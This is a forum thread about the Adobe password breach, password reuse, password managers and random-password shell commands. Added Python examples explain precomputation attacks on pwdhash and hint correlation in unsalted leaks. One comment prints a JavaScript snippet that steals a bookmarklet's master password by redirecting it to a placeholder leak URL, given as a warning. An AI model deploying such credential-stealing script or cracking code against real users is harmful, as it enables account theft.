
Shit. Looks like I got caught up in the adobe breach. Let this be a lesson to all engineers in charge of such situations to implement strong security. You are partially responsible for these disasters.

I got a call from PayPal a week or two ago. It turns out somebody in Indonesia accessed my PayPal account, presumably with credentials scraped from Adobe. I know, I know, shame on me for reusing passwords. Luckily no damage was done and I changed it to the strongest password I've assigned anything yet.

Great job, op (if you're the one who wrote this service) for such an amazing tool. Everyone, if you haven't already, you really should check if you've been compromised. I will be sending this to all my friends.



This should be a lesson not to manage your own passwords, use a password manager there are many to choose from. I was also caught up in the Adobe breach but my password was randomly generated by my password manager.


I am surprised by how few people are aware of this: https://www.pwdhash.com/

Convenience provided via Chrome/Firefox extensions, portability provided by the website.


I second this. I've been using it for a few years now. It gives me great peace of mind knowing that my password on a site like HN is something like "e5wLoMB1kZ". I only have to remember a few passwords and yet each site has a unique password.

Even in the event of a leak of plain-text passwords I'm still secure in knowing that my other accounts won't be compromised unless there is a very determined attacker.

However, you do have to put some trust in the extension and the website. Fortunately, the website has some good credentials and the extensions have appeared clean... for now.


Yeah, I did not hear about pwdhash and it sounds like a nice idea.

One thing I have noticed though is that when one enters the same site password, you get the same "Hashed" password back to use. Yes, there is an extra step involved here so that buys you some security but I will be cautious in reusing site passwords.

Imagine an attack where for the top 100 sites in the world, all of the most commonly used passwords are used to generate the "Hashed" (pwdhash) passwords for each site and compile that info into a big list. This can then be added to the candidate list of password that can be tried in cracking leaked hashes.

The takeaway here is that even though pwdhash gives you domain-specific generated passwords, you should make sure that you use a different site password as input to pwdhash for each site.


There is also http://supergenpass.com, which uses a JavaScript bookmarklet to do the hashing.


That is an extremely bad idea. Any site you use can put the following JavaScript in their site to obtain your master password next time you use the bookmarklet:

    // fires once the bookmarklet has injected its form into the page
    document.documentElement.addEventListener("DOMSubtreeModified", function() {
      // the master password field then leaks to the attacker's server on every change
      $("#gp2_master").change(function() {
        location.href = "http://example.org/leak/" + $("#gp2_master").val()
      })
    })


You can use an enigmapass or a few of the other browser extensions to avoid this. Also there are iphone and android apps.


I like https://oneshallpass.com/ better since it lets you change some attributes about the passwords generated. So if a site is compromised you can just increment the generation field and get a totally new hash.


Is it protecting from the possibility of web sites being compromised with your data by trusting the website and the extension? How is it better?


It's a start, but you'd need all the mobile platforms on it too.


Eh, that's awesome. There's an Android app, too, so I can use this on my phone.

They don't seem to mention anywhere which hashing algorithm they use. Also, the lengths are quite small. Any idea why?


pwdhash uses a weak hashing mechanism, making it possible to brute-force master passwords. It is OK to use, but make sure that you have a cryptographically strong master password.
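
The precomputation attack described a few comments up (common master passwords times top sites, compiled into a candidate list) and the weak-master brute force mentioned just above, as an added example that is not from the page or from PwdHash itself. PwdHash's paper describes the derivation as HMAC-MD5 over the site domain keyed by the master password; the base64 encoding and truncation below are my own simplification, so the outputs will not match the real tool, and the password lists, site list and the "breached site stored unsalted SHA-1" assumption are all constructed for the example.

```python
import base64
import hashlib
import hmac


def site_password(master: str, domain: str, length: int = 10) -> str:
    """Domain-specific password: HMAC-MD5 over the domain, keyed by the master
    password (PwdHash's construction). base64 plus truncation is a simplification
    of my own; the real tool's output encoding differs."""
    mac = hmac.new(master.encode(), domain.encode(), hashlib.md5).digest()
    return base64.b64encode(mac).decode()[:length]


# Constructed stand-ins for "most common passwords" and "top 100 sites".
COMMON_MASTERS = ["password", "123456", "qwerty", "letmein", "dragon", "monkey"]
TOP_SITES = ["paypal.com", "amazon.com", "news.ycombinator.com", "adobe.com"]


def build_candidate_table(masters, domains):
    """Attacker's precomputation: derived password -> (master, domain) for every
    pair. Done once, then reused against any leak from any of these sites."""
    return {site_password(m, d): (m, d) for m in masters for d in domains}


def leaked_record(plain: str) -> str:
    """Assumption for the example: the breached site stored an unsalted SHA-1
    of the (derived) password."""
    return hashlib.sha1(plain.encode()).hexdigest()


def recover_master(leaked_sha1: str, table):
    """Crack the leaked hash by hashing only the precomputed candidates."""
    for candidate, (master, domain) in table.items():
        if leaked_record(candidate) == leaked_sha1:
            return master, domain
    return None


def pivot(master: str, domains):
    """Once the master is known, every other site's password falls out for free,
    even though each site's derived password was different."""
    return {d: site_password(master, d) for d in domains}


if __name__ == "__main__":
    table = build_candidate_table(COMMON_MASTERS, TOP_SITES)
    # Victim uses a common master with pwdhash everywhere; paypal.com's hash leaks.
    leak = leaked_record(site_password("letmein", "paypal.com"))
    hit = recover_master(leak, table)
    print("recovered:", hit)
    print("pivot:", pivot(hit[0], ["amazon.com", "news.ycombinator.com"]))
    # A random master is in no precomputed table, whatever the derivation.
    strong = leaked_record(site_password("cZm4-vR9q!xT", "paypal.com"))
    print("strong master:", recover_master(strong, table))
```

The domain separation holds (the same master gives different passwords on different sites), but the derivation is public and cheap, so the master's strength is the only thing standing between a single leak and every other account; that is the point of the comment above about a cryptographically strong master.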


I generate passwords with something like:

printf "/" ; openssl rand -base64 32 | sed 's/.$//'

The leading slash was a nice tip someone gave me to not echo if you accidentally paste the password into IRC... Though if the password itself contains a slash then your client won't consider it a command and will echo it anyway, so do what you will.

Anyway, each new account gets a new password you couldn't beat out of me, though you could probably get my password safe phrase, so do what you will.

Generating long passwords like this highlights providers who enforce password length limits. Paypal's limit is ludicrously short. Hetzner's is limited too.

edit more guff.


Crap, looks like my wife's email was caught up in the Adobe breach. I think she created an account for reading ebooks with Adobe DRM downloaded from our library.

Consider this a heads up for married HN'ers, you should check their emails too.


In Australia, both my wife and I got mailed out letters from Adobe regarding our accounts being potentially compromised. Did that happen elsewhere as well?


I got an email but assumed it was a phishing attempt until I read that they were actually doing this.


Got the same one -- USA


What do you do when you are using a different computer and need to login to site?


I use a yubikey that outputs half of the password used to unlock my KeePass database, the other half is in my head (so even if they steal my yubi they can't do much). The database is backed up on my own owncloud which is hosted on my own vps and replicated on other 3-4 servers (all mine). My little personal cloud setup.

Call me paranoid but it took me half an hour to set it up and the monthly fees for the servers are very very low.


" … hosted on my own vps … "

Might want to think through whether that really counts as "your own". Who's got hypervisor access to the hardware? Any keys or passphrases that ever hit the disk or memory on someone else's hardware should (at least at some levels of paranoia) be considered "possibly compromised".

(I store "sensitive stuff" on AWS/DigitalOcean/other-vps-providers, but only if it's first encrypted locally and the key/passphrase never gets used/stored on the vps. EncFS works pretty well dealing with that for me... I do, though, "trust" 1Password's datafile encryption enough to take advantage of the iOS/MacOSX sync features they've implemented over Dropbox. That's possibly not a choice I'd make if I thought I were a target of someone like the NSA.)


For some logins, the answer is "Sorry Dave, I can't do that." If I don't have the private cert, or the ssh cert, or the right hole in the firewall - there are many thing I've chosen intentionally to not be able to log in to using someone else's computer.

For less security-critical logins, I've got my password software (1Password) on my phone (and iPad). For some intermediate level logins, I need my phone or iPad anyway, I've got TOTP two-factor auth (using Google's Authenticator app) on a bunch of important stuff (Amazon/AWS, DigitalOcean, Dropbox, GitHub, the email account that all my domain names are registered with and to which password resets go, and a few other things…)


What will you do if your primary computer gets stolen?


Private SSL/TLS certs, ssh keys, and 1Password database are all stored on encrypted filesystems (EncFS) and synced across four machines (two at work, one at home, and my laptop) using Dropbox (which is another off-site copy, and has revision archives) and/or BTSync. Those four copies are all OS X Time Machine backed up (and revision archived) - and two of those Time Machine backups are rsynced nightly to separate drives in opposite locations - so all up (not counting Dropbox) I've got copies on 10 separate spindles in two physical locations, two of them in a locked filing cabinet (the work time machine and rsync disks).

I've had a "primary computer" stolen before – and I don't intend to ever have that much grief if (when?) it happens again. I'm confident that even if all the electronics from either one of my work or home get stolen, I could be back into fully productive work-mode in half a day and one maxed-out-creditcard at the local Apple store. (If someone hits both my work and home locations simultaneously, I suspect I've got bigger problems than whether I'll have angry clients shouting at me before the weekend…)


My first question would be "how often does that really happen?". It's a legitimate concern at first sight, but for me, I pretty much never need to do that since I always have my phone with me.

But if I do need to, I have 1Password on my phone as well and can get the passwords from it.


Presumably you can open your password manager's web service and do it from there.


That or use your phone. Most password managers have apps.


Ok, that makes the most sense to me.


I wouldn't want to use a webservice to look at my passwords. I want to open my password safe locally. Less likely to be snooped upon (though still possible, obviously).


I have the encrypted password file on a usb thumb drive. I remember the master password. I view as fatally flawed any password store that uploads the encrypted password file to a remote server.


If you don't mind paying a small annual fee, Lastpass is a very nice tool for automated password management across devices.


Use a browser add-on for exporting/importing passwords, transfer the exports on an encrypted USB stick.


You can have the password repository in dropbox to sync between different machines, and also use the app


You can. I would not. I don't want my password file uploaded to any remote server.


I don't. I carry my passwords (via 1Password) on my phone, so I'll just use that.


passpack.com

But I would not really be comfortable using it on an unknown computer, unless I had good knowledge that it was properly administered.


I carry a little piece of paper in my wallet that has my private key further encrypted by myself, and that encrypted key is used to decrypt other passwords through a private web/mobile app I made. The top encryption key I have is just some sort of simple algebraic mumbo jumbo formula I used to scramble my private key just a bit, and I change it up once in awhile, and have that written down. What's in my memory is how I jumbled it.


Well until the recent 4.x / 3.x screwup [1] that 1Password did it has been quite useful (and like you, my 16 character password at Adobe, even if guessed, would not be useful anywhere else)

[1] My 3.x was upgraded to 4.x on my Macbook (unbidden) and the only way to restore compatibility with my 3.x on iOS is to pony up another $20. Can't go back to 3.x on the Macbook, not particularly happy about the upgrade fee on iOS.


FWIW, I think version 4 is a worthwhile upgrade on iOS, and I see the price at $9.99 at the moment (at least in the US store).


It was quite an astonishing move to break 1Password (mine is still broken) when Apple released their own free product.


  > there are many to choose from
This is the reason I don't use one... I still haven't decided which, even if _any_ is better than nothing.


... Aren't password managers the #1 target for hackers nowadays?

Imagine how much that wallet could be worth... How much bribe does the weakest 1Password engineer need?


Then use a local storage one, like password-safe (Win & Mac. password-gorilla for Linux). Combine that with spideroak, dropbox, google drive or whatever file syncing utility you want.


Anyone know what adobe's password requirements were? I don't know which password I used there: Adobe forced me to change it without letting me test the old one.


For the Adobe breach specifically, you might try the site set up by Last Pass, which checks your email against the breached data: https://lastpass.com/adobe/

The added feature is that, if your email is in the list, Last Pass will share with you how many others had your same password -- and the list of all password hints associated with that password. If more than a handful of others used the same password, that should jog your memory about which you used.

P.S. I'm not associated with Last Pass and actually use a different product. But I found this site very helpful.


This is beautiful. Thank you so much. I'd been getting really frustrated not knowing which passwords I'd needed to change but my hint was enough!


You can just torrent users.tar.gz (the leaked list of encrypted passwords) and then grep the file for your email address, which will give you the encrypted version of your password.


...which does not really help without the crypto-key - even if you know a list of possible passwords you cannot test them.


Well, funnily enough, if you know your password and it was in the leak, you can test it against your own password.


lastpass.com/adobe will show you the list of hints of yourself and other users that used the password.


Wonderful. (sarcasm)


> Great job, op (if you're the one who wrote this service)

Looks like no.

"Have I been pwned?" is by Troy Hunt http://www.troyhunt.com/

The OP's bio indicates that they are someone else. https://news.ycombinator.com/user?id=mountaineer


I got pwned by adobe too. Luckily password there was one of my "weak" ones, and I do not use it anywhere of importance.


Same here. I used my throw-away email to sign up at Adobe, along with my weak throw-away password. I don't have any Adobe licenses or such. The only Adobe product I use is the Flash plugin.

The email account is on Hotmail and currently has about 54k messages in its in-box, 99.9% unread. I use it to create accounts on news sites and annoying fora and such, always with the same weak password. About the only time I log into it is to respond to password confirmation requests generated during account creations.

Originally, the weak password was also my email password. However, a few years ago, the email account got hacked severely, such that MSFT wouldn't let me in until I reset the password. It now has a strong password.


That's not very "lucky," it seems very intentional.


I had a very insecure password on adobe.com. i.e. low-enough entropy that 55 users had the exact same password. I figured since Adobe do not have my credit card number and there is nothing to gain by impersonating me on that site, it did not matter. I have not used the same email/password combination elsewhere, but even if I did it would only be on other low-value accounts. I'm not worried about attackers finding it by association either (they will have it already from dictionary attacks.)


I had something similar happen to one of my Windows Live accounts. Someone somehow broke into it and, although I did not have any credit card information, they decided to continue to use it. They added a stolen credit card to the account. I received an email in japanese from Xbox Live (! I have never owned an Xbox, someone converted my account, nor do I speak japanese) at one point which prompted me to call their support and figure all of this out.

But the point I'm trying to get across is, if I were unlucky that could have turned into a HUGE mess where I was accused of stealing said credit card. Luckily that did not occur (probably because they could trace it to a separate IP address.. and I don't own an Xbox). I no longer use passwords as insecure as I did for that account - I had to deal with this headache while at my family's Christmas party as well (because that is when I received the email), which made it even more irritating.


It was lucky in the sense that if Adobe had required complex passwords, a more important password would have been leaked. It was also lucky in the sense that Adobe itself got hacked instead of an entity that has one of my more sophisticated and thus valuable passwords.


One of my addresses was also in the Adobe breach. No idea what password I used there, but I'm fairly sure it must have been either my common "junk" password, shared with tons of forums, but nothing that poses any serious risk to me (just to those forums). Or if they had stricter requirements, some variation on it that I always forget, so I have to ask them for a new password every time anyway.

I certainly don't reuse financial or email passwords. Or actually I do, but only for financial and email stuff. But I probably shouldn't reuse them at all.

But those forums? I'm just not going to keep track of a new password for every site I visit.


If you're using a forum, you're in front of a computer. Keeping track of things is one of the things computers are _best_ at. Get yourself a password manager. I use 1Password, but I hear good things about KeePass and LastPass too.

Seriously - you can't manage 2013 grade password complexity requirements for all the places you need passwords in your head any more (it's likely you never could…)

Get a tool to help, computers are wonderful tools.


I've got KeePass, but I haven't used it remotely as long as I've used many websites. Also, I don't have my KeePass DB in Dropbox, so I can't access it from other computers.

More than that, I'd rather not put my KeePass DB on someone else's machine in the first place. But I'll easily trust strange computers with a password for some crappy forum.

There's always something you risk compromising. I prefer some forum account to be compromised.


My wife was on the Adobe list, the same credit card she used at Adobe was charged from Amazon or paypal ( I can't remember which ) couple of weeks after the leak. She called the bank they closed it right away and took the charges off the card.


I woke up this Thanksgiving with a bunch of email notifications from Paypal that my account had been hacked and taken over. I (also shame on me) tend to reuse some of my passwords, and figured someone got into my Paypal account using my adobe credentials, not even being sure if I had created an account with adobe for anything in the past.

I checked my email address on this site and it didn't find any pwnage.

I'm relieved my email address isn't in any of these leaks, but also now concerned about whatever it was that let someone into my paypal account so easily...


If you reuse passwords, separate throw-away accounts (like Adobe or pretty much anything that's not your email, your bank or PayPal), from the important stuff.

Sites that need to be secure, hopefully really are secure. Sites that don't really need to be secure because they don't deal in anything of value, probably don't invest quite as much in security. Reusing passwords across those different kinds of sites means the extra security of the secure sites is wasted.

Of course it's way better not to reuse at all, but remembering two or three passwords is a lot easier than dozens, and still a lot safer than just one.


> Looks like I got caught up in the adobe breach.

I knew I was, but I was delighted by what Dreamhost did: they have cross-checked their users' e-mails with the Adobe leaked database and sent a message [1] to affected users explaining the situation and advising to change the password, reminding them not to re-use passwords and suggesting password vaults.

I think it's a great thing to do by third-parties when leaks of this magnitude happen.

[1] Full text: http://pastebin.com/2AkU0v98


Have fun closing your account by the way, I went through that fiasco recently. I regularly run the LastPass security challenge and an old email of mine was in the Adobe breach too.

49 customers are in line ahead of you. ..5 mins.. 48 customers are in line ahead of you. ..5 mins.. 48 customers are in line ahead of you. ..5 mins.. 48 customers are in line ahead of you. ARG!


After the Macrumors breach (I had only signed up about 2 weeks before it happened), I decided it was time to make all my passwords unique and to use a credentials manager like 1Password. I too shared the same password for multiple sites/services (shame on me too).


Fuck me. Ditto. The reason I checked? I unknowingly, until today, had a domain name transferred away from me -- or rather, ownership changed, for a domain I bought years ago for $3,000. Email address used for that domain in Adobe breach.


Looks like I was caught in Adobe breach as well. Luckily I use one off passwords for each site I log into. Damn.


Yahoo here. How the hell did the hackers get the passwords in plain text? Were they seriously unencrypted?


They were encrypted, but with no per-email variation between the stored values. https://lastpass.com/adobe/ will show you the password hints associated with the (in my case) 200 people with the same (encrypted) password. The clues would be sufficient to guess the password.

I've gone to generating a unique password with a simple random number generator if the end site supports password recovery (in case Chrome's password memorizing system forgets it).

    #!/bin/bash
    # optional length argument, default 16
    if [ $1 ] ; then
      a=$1
    else
      a=16
    fi
    # 1000 random bytes, keep only alphanumerics, then take the first $a characters
    dd if=/dev/urandom bs=1000 count=1 2>/dev/null | tr -d -c "[:alnum:]" | tr -d '`' | tr -d "'" | tr -d '"' | tr -d '\\' | head -c $a
    echo
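
The correlation trick behind the LastPass checker described in the comment above, and the exchange further up about the leak being useless without the key unless you already know your own password, as an added example that is not from the page, from Adobe or from LastPass. The page only says the passwords were encrypted without per-account variation; the keyed function below is a stand-in with just that property (same password, same stored value under one key), not Adobe's actual scheme, and every record, email and hint is constructed. The salted PBKDF2 variant at the end is the conventional fix, added for contrast.

```python
import hashlib
import hmac
import os
from collections import defaultdict

# Constructed single key, standing in for the one key the whole table was encrypted under.
SERVER_KEY = b"constructed-server-key"


def encrypt_no_variation(password: str) -> bytes:
    """Stand-in for deterministic, unsalted, single-key encryption. A keyed hash is
    used only because it has the one property that matters here: the same password
    always yields the same stored value, whichever account it belongs to."""
    return hmac.new(SERVER_KEY, password.encode(), hashlib.sha256).digest()[:8]


# Constructed leak records: (email, stored value, password hint).
LEAK = [
    ("alice@example.com", encrypt_no_variation("adobe123"), "company name then 123"),
    ("bob@example.com",   encrypt_no_variation("adobe123"), "the usual one"),
    ("carol@example.com", encrypt_no_variation("adobe123"), "where I bought photoshop + numbers"),
    ("dave@example.com",  encrypt_no_variation("correct horse"), "xkcd"),
]


def group_by_stored_value(records):
    """Nobody can decrypt without the key, but equal stored values mean equal
    passwords, so the hints of everyone in a group describe one password."""
    groups = defaultdict(list)
    for email, stored, hint in records:
        groups[stored].append((email, hint))
    return groups


def others_with_my_password(email, records):
    """What the checker does: everyone sharing your stored value, with their hints.
    You know your own password, so their hints are leaking nothing new to you,
    but an attacker reading the hints learns the shared password the same way."""
    my_stored = next(stored for e, stored, _ in records if e == email)
    return [(e, h) for e, h in group_by_stored_value(records)[my_stored] if e != email]


def store_salted(password: str, salt=None):
    """The fix: a per-account random salt plus a slow KDF, so two accounts with
    the same password no longer look alike."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


def verify_salted(password: str, salt: bytes, digest: bytes) -> bool:
    return hmac.compare_digest(store_salted(password, salt)[1], digest)


if __name__ == "__main__":
    for stored, members in group_by_stored_value(LEAK).items():
        print(stored.hex(), len(members), "accounts, hints:", [h for _, h in members])
    print("alice shares a password with:", others_with_my_password("alice@example.com", LEAK))
    digests = {store_salted("adobe123")[1] for _ in range(3)}
    print("salted copies of the same password, distinct values:", len(digests))
```

Grouping costs nothing beyond a sort of the leaked file; the hints then do the "cracking" without a single decryption. With the salted store, the grouping step yields only singletons, and the checker's own trick stops working along with the attacker's.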


This is not meant as criticism: Is there any particular reason for all the tr pipes? Is there any advantage to using tr instead of base64?

I essentially use the following:

  base64 </dev/urandom | head -c $COUNT | xargs -0


Criticism welcome. Yours is nicer.


I use this for a little more entropy:

    LANG=C tr -dc "[:print:]" < /dev/urandom | fold -w 32 | head -n 1


I much prefer using the program `pwgen`. It's installed on all my Linux boxes and it's available from Cygwin too, and it generates a 'pronounceable' password, which makes it a lot easier to remember and also much easier to copy.

There's also the benefit of fewer moving parts -- with a pipeline like that, I'd be worried about accidentally stripping out some of the randomness. I'm fairly confident that a simple invocation of `pwgen` will work.
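
On the worry just above about a `tr` pipeline "stripping out some of the randomness", and the earlier question of `tr` versus `base64`, here is an added example (mine, not from the page or from any of the tools named) that works the distributions out exactly rather than by sampling. It compares what `tr -dc` does (rejection: drop bytes outside the alphabet) with the shortcut it is often replaced by (`alphabet[byte % size]`), and computes how many symbols each alphabet needs for 128 bits; the three alphabets are reconstructed from the pipelines in this thread.

```python
import math
import secrets
import string
from collections import Counter

# Alphabets of the pipelines above (reconstructed here for the example).
ALNUM = string.ascii_letters + string.digits                      # tr -dc "[:alnum:]"   -> 62 symbols
BASE64 = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"  # base64 -> 64
PRINTABLE = "".join(chr(c) for c in range(0x20, 0x7F))            # LANG=C tr -dc "[:print:]" -> 95


def rejection_distribution(alphabet):
    """What `tr -dc` does: keep a random byte only if it is in the alphabet.
    Each kept byte value maps to exactly one symbol, so the result is uniform;
    dropping bytes discards randomness you never used, not randomness you kept."""
    return Counter(chr(b) for b in range(256) if chr(b) in alphabet)


def modulo_distribution(alphabet):
    """The tempting shortcut `alphabet[byte % len(alphabet)]`: unless the alphabet
    size divides 256, the first (256 mod size) symbols get hit one extra time."""
    return Counter(alphabet[b % len(alphabet)] for b in range(256))


def bias_ratio(dist):
    """Probability of the most likely symbol over the least likely; 1.0 is uniform."""
    return max(dist.values()) / min(dist.values())


def bits_per_symbol(dist):
    """Shannon entropy per symbol of a (possibly skewed) distribution."""
    total = sum(dist.values())
    return -sum((n / total) * math.log2(n / total) for n in dist.values())


def length_for_bits(alphabet, bits=128):
    """Symbols needed for `bits` of entropy from a uniform alphabet."""
    return math.ceil(bits / math.log2(len(alphabet)))


def generate(n, alphabet=ALNUM):
    """Unbiased generator; secrets.choice does the rejection sampling internally."""
    return "".join(secrets.choice(alphabet) for _ in range(n))


if __name__ == "__main__":
    for name, alphabet in (("alnum", ALNUM), ("base64", BASE64), ("printable", PRINTABLE)):
        rej, mod = rejection_distribution(alphabet), modulo_distribution(alphabet)
        print(f"{name:9s} tr -dc bias {bias_ratio(rej):.2f}  "
              f"modulo bias {bias_ratio(mod):.2f} ({bits_per_symbol(mod):.3f} bits/symbol)  "
              f"{length_for_bits(alphabet)} symbols for 128 bits")
    print(generate(22))
```

So the pipelines in this thread are fine: rejection is exactly uniform, and base64 is unbiased too because it slices the byte stream into 6-bit groups. The one thing to watch in the `dd` version is the fixed `bs=1000`: about 62/256 of those bytes survive `tr -dc "[:alnum:]"`, roughly 242 characters, so asking for a longer password than that silently returns a shorter one.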


Mine showed for Adobe as well, but I don't have an account with Adobe?



